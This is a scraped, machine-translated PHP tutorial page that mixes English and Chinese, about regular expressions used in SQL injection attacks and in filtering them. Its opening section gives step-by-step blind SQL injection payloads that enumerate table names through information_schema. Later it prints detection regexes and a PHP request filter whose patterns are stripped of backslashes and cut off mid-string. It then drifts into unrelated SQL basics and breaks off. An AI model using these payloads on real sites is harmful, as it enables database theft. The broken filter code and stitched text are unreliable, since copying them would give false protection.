Summary of common sql attack regular expressions in php, sql regular expression_PHP tutorial

A summary of common sql attack regular expressions in php, sql regular expressions

The examples in this article describe common SQL attack regular expressions in PHP. Share it with everyone for your reference. The specific analysis is as follows:

We all already know that in MYSQL 5+, the information_schema library stores all library names, indications and field name information. Therefore, the attack method is as follows:

1. Determine whether the first character of the first table name is a character in a-z, where blind_sqli is an assumed known library name.
Note: ^[a-z] in the regular expression means that the starting character in the string is in the range of a-z

Copy code The code is as follows:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA=" blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*

2. Determine whether the first character is a character in a-n

Copy code The code is as follows:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA=" blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*

3. Make sure the character is n

Copy code The code is as follows:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA=" blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /*

4. The expression is replaced as follows

Copy code The code is as follows:

expression like this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE

At this time, it means that the table name is news. To verify whether it should be indicated, the regular expression is '^news$', but it is not necessary. Just judge table_name = 'news' directly.

5. Next, guess the other tables. You only need to modify limit 1,1 -> limit 2,1 to make blind injections for the next tables.

For example:

Copy code The code is as follows:

$Exec_Commond = "( s|S)*(exec(s|+)+(s|x)pw+ )(s|S)*";
$Simple_XSS = "( s|S)*((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)(s|S )*";
$Eval_XSS = "( s|S)*((%65)|e)(s)*((%76)|v)(s)*((%61)|a)(s)*((%6C )|l)(s|S)*";
$Image_XSS = "( s|S)*((%3C)|<)((%69)|i|I|(%49))((%6D)|m|M|(%4D))( (%67)|g|G|(%47))[^n]+((%3E)|>)(s|S)*" ;
$Script_XSS = "( s|S)*((%73)|s)(s)*((%63)|c)(s)*((%72)|r)(s)*((%69 )|i)(s)*((%70)|p)(s)*((%74)|t)(s|S)*";
$SQL_Injection = "( s|S)*((%27)|(')|(%3D)|(=)|(/)|(%2F)|(")|((%22)|(- |%2D){2})|(%23)|(%3B)|(;))+(s|S)*";

SQL attack code:

Copy code The code is as follows:

function customError($errno, $errstr, $errfile, $errline)
{
    echo "Error number: [$errno],error on line $errline in $errfile
";
    die();
}
set_error_handler("customError",E_ERROR);
$getfilter="'|(and|or)b.+?(>|<|=|in|like)|/*.+?*/| $postfilter="b(and|or)b.{1,6}?(=|>|<|binb|blikeb)|/*.+?*/| $cookiefilter="b(and|or)b.{1,6}?(=|>|<|binb|blikeb)|/*.+?*/| function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq)
{   
    if(is_array($StrFiltValue))
    {
        $StrFiltValue=implode($StrFiltValue);
    }
    if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1&&!isset($_REQUEST['securityToken']))
    {
        slog("

操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue);
        print "result notice:Illegal operation!";
        exit();
    }
}
foreach($_GET as $key=>$value)
{
    StopAttack($key,$value,$getfilter);
}
foreach($_POST as $key=>$value)
{
    StopAttack($key,$value,$postfilter);
}
foreach($_COOKIE as $key=>$value)
{
    StopAttack($key,$value,$cookiefilter);
}
  
function slog($logs)
{
    $toppath="log.htm";
    $Ts=fopen($toppath,"a+");
    fputs($Ts,$logs."rn");
    fclose($Ts);
}
?>

sql分析：

如果使用这个函数的话，这个函数会绕开PHP的标准出错处理，所以说得自己定义报错处理程序(die())。
其次，如果代码执行前就发生了错误，那个时候用户自定义的程序还没有执行，所以就不会用到用户自己写的报错处理程序。　

那么，PHP里有一套错误处理机制，可以使用set_error_handler()接管PHP错误处理，也可以使用trigger_error()函数主动抛出一个错误。

set_error_handler()函数设置用户自定义的错误处理函数。函数用于创建运行期间的用户自己的错误处理方法。它需要先创建一个错误处理函数，然后设置错误级别。　　　
关于的用法：

复制代码 代码如下:

function customError($errno, $errstr, $errfile, $errline)
{
　　echo "错误代码: [${errno}] ${errstr}rn";
　　echo " 错误所在的代码行： {$errline} 文件{$errfile}rn";
 　 echo " PHP版本 ",PHP_VERSION, "(" , PHP_OS, ")rn";
　　// die();
}
set_error_handler("customError",E_ALL| E_STRICT);

Summary

When PHP encounters an error, it will give the location, line number and reason of the error script. Many people say that this is not a big deal. But the consequences of leaking the actual path are unimaginable. For some intruders, this information is very important. In fact, many servers now have this problem. Some network administrators simply set display_errors in the PHP configuration file to Off to solve the problem, but I think this method is too negative. Sometimes, we really need PHP to return error information for debugging. And when something goes wrong, you may also need to give the user an explanation or even navigate to another page. But with set_error_handler(), these contradictions can be resolved. But I found that this function is rarely used.

I hope this article will be helpful to everyone’s PHP programming design.

php regular expression parsing sql

$sql='
CREATE TABLE IF NOT EXISTS uploadtype(
id int(11) NOT NULL AUTO_INCREMENT,
title varchar(20) DEFAULT '0',
sydefault char(1) DEFAULT '0' ,
PRIMARY KEY (id)
) ENGINE=MyISAM
';
preg_match('#CREATE TABLE.*\(.*\)ENGINE=MyISAM#isU',$ sql,$typefile);
var_dump($typefile);

Common symbols for sql regular expressions

SQL classification:
DDL—Data Definition Language (CREATE, ALTER, DROP, DECLARE)
DML—Data Manipulation Language (SELECT, DELETE, UPDATE, INSERT)
DCL—Data Control Language (GRANT) , REVOKE, COMMIT, ROLLBACK)

First, briefly introduce the basic statements:
1. Description: Create database
CREATE DATABASE database-name
2. Description: Delete database
drop database dbname
3. Description: Backup sql server
--- Create backup data device
USE master
EXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7backup\MyNwind_1.dat '
--- Start backup
BACKUP DATABASE pubs TO testBack
4. Description: Create a new table
create table tabname(col1 type1 [not null] [primary key],col2 type2 [not null ],..)
Create a new table based on an existing table:
A: create table tab_new like tab_old (use the old table to create a new table)
B: create table tab_new as select col1,col2… from tab_old definition only
5. Description: Delete a new table drop table tabname
6. Description: Add a column
Alter table tabname add column col type
Note: Once a column is added, it cannot be deleted. In DB2, the data type cannot be changed after the column is added. The only thing that can be changed is to increase the length of the varchar type.
7. Instructions: Add primary key: Alter table tabname add primary key(col)
Instructions: Delete primary key: Alter table tabname drop primary key(col)
8. Instructions: Create index: create [unique] index idxname on tabname(col….)
Delete index: drop index idxname
Note: The index cannot be changed. If you want to change it, you must delete it and rebuild it.
9. Instructions: Create a view: create view viewname as select statement
Delete a view: drop view viewname
10. Instructions: A few simple basic sql statements
Select: select * from table1 where Range
insert: insert into table1(field1,field2) values(value1,value2)
delete: delete from table1 where range
update: update table1 set field1=value1 where range
find: select * from table1 where field1 like '%value1%' ---like's syntax is very sophisticated, check the information!
Sort: select * from table1 order by field1,field2 [desc]
Total: select count(*) as totalcount from table1
Sum: select sum(field1) as sumvalue from table1
Average: select avg(field1) as avgvalue from table1
Maximum...The rest of the full text>>

http://www.bkjia.com/PHPjc/907279.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/907279.htmlTechArticleA summary of common sql attack regular expressions in php, sql regular expressions This article describes the common sql in php Attack regular expressions. Share it with everyone for your reference. The specific analysis is as follows:...